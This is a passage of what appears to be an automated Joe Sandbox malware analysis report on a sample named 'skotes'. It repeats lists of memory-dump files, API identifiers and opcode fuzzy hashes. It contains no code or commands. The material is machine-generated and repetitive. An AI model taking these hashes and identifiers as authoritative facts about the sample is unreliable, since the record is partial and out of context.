                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                                                                                                                • API String ID: 246774199-923244539
                                                                                                                                                                                                                                                                • Opcode ID: 6952b7782464c7d085fc6fe56b10e05ae3ef98ed69987fccc5f5b29902782247
                                                                                                                                                                                                                                                                • Instruction ID: dd40bf2d8f06f2498227f56710b6d7e96ddde5cd3df96091ec411f239dca4932
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6952b7782464c7d085fc6fe56b10e05ae3ef98ed69987fccc5f5b29902782247
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1F0E936A0020CE7CB24FB54DD43EAEB7789E90728B15C66EE50667181DF70AA05C692
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                                • Instruction ID: 59331a186c7f007e6ab3cfed68c9a5f719f4b1474f554e7d5868b872744e98c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06B136729042869FDB15CF68C8817EEBBF5EF45360F54416BE956EB342DA348D01CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1635606685-0
                                                                                                                                                                                                                                                                • Opcode ID: 24b7f925bd8906fac0bfc8cc471cc9bbdc20724abf1e4f395fb52ee36aa5f8d5
                                                                                                                                                                                                                                                                • Instruction ID: 4cfdf8fc634f72f2c1b9fb9fc034a22c9f41f0e189b77e2ad4f740cb09a0a67e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24b7f925bd8906fac0bfc8cc471cc9bbdc20724abf1e4f395fb52ee36aa5f8d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3281D272D002859FDF209FA68991EEF7BB99F293D4F194865E811B7242E731CC40CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                • Opcode ID: eaea11258e7f4fffe9571289f4a19c9b64ef2e6aa71b657755c2ee1d02e2d1a4
                                                                                                                                                                                                                                                                • Instruction ID: 8fa2ea5323e2198b6ec1feefc8347bf82359285a50027dad95c7e1dc977442ec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaea11258e7f4fffe9571289f4a19c9b64ef2e6aa71b657755c2ee1d02e2d1a4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1851C172E01A06AFDB29AF64D941BBAB7B5EF14300F14462AF917473A1E731ED40CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1707706676-0
                                                                                                                                                                                                                                                                • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                                                                                                                                                • Instruction ID: c04c49a6ab499e6dc4056882469f83f7719474b00f2f346cbd2d3e644d858f20
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB518B39A042099FDF11CF68C5806EEBBF6EF19354F14449BE892A7351D732AE45CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
